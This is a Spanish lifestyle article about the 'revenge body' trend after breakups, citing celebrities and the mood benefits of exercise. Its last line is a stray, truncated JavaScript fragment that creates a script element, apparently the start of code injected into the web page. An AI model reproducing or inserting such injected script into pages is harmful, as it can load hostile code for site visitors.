Lección #1 de las celebs: la mejor terapia después de una ruptura es el gimnasio.
Cuando terminas una relación todo parece gris. Encontrar motivación para hacer algo por ti se vuelve imposible. Nadie lo dice, pero un corazón roto duele hasta el alma, incluso provoca malestar físico.
Es cuando estás tratando de salir adelante que te das cuenta que caer es la oportunidad perfecta para levantarte más fuerte y decides que un revenge body es lo que necesitas.
¿Qué es un revenge body?
El reflejo de tu propia voluntad y un indudable boost de autoestima. Es conseguir ese cuerpo de impacto que sacie ese deseo de satisfacción y confort que necesitas para superar esa relación fallida. Es el resultado de las horas dedicadas al gimnasio para lucir espectacular.
La historia de Bella Hadid es clara: semanas después de haber terminado su relación con The Weeknd, su ex pareja fue vista muy cariñosa con Selena Gomez. ¿Su respuesta? Un video en Instagram que llevó el término a un nuevo nivel. Y es que… cuando te ves bien, te sientes bien.
Es una realidad que el ejercicio cura. Está comprobado que la producción de endorfinas que produce tiene un efecto antidepresivo, ansiolítico y antiestrés. Tal vez eso explique por qué Taylor Swift se refugia en el gimnasio después de alguna de sus tantas rupturas o por qué Khloé Kardashian superó su divorcio con una impresionante musculatura.
Si necesitas una pequeña dosis de inspiración fitness, Teyana Taylor puede convertirse en tu nueva musa.
var d=document;var s=d.createElement(‘script’);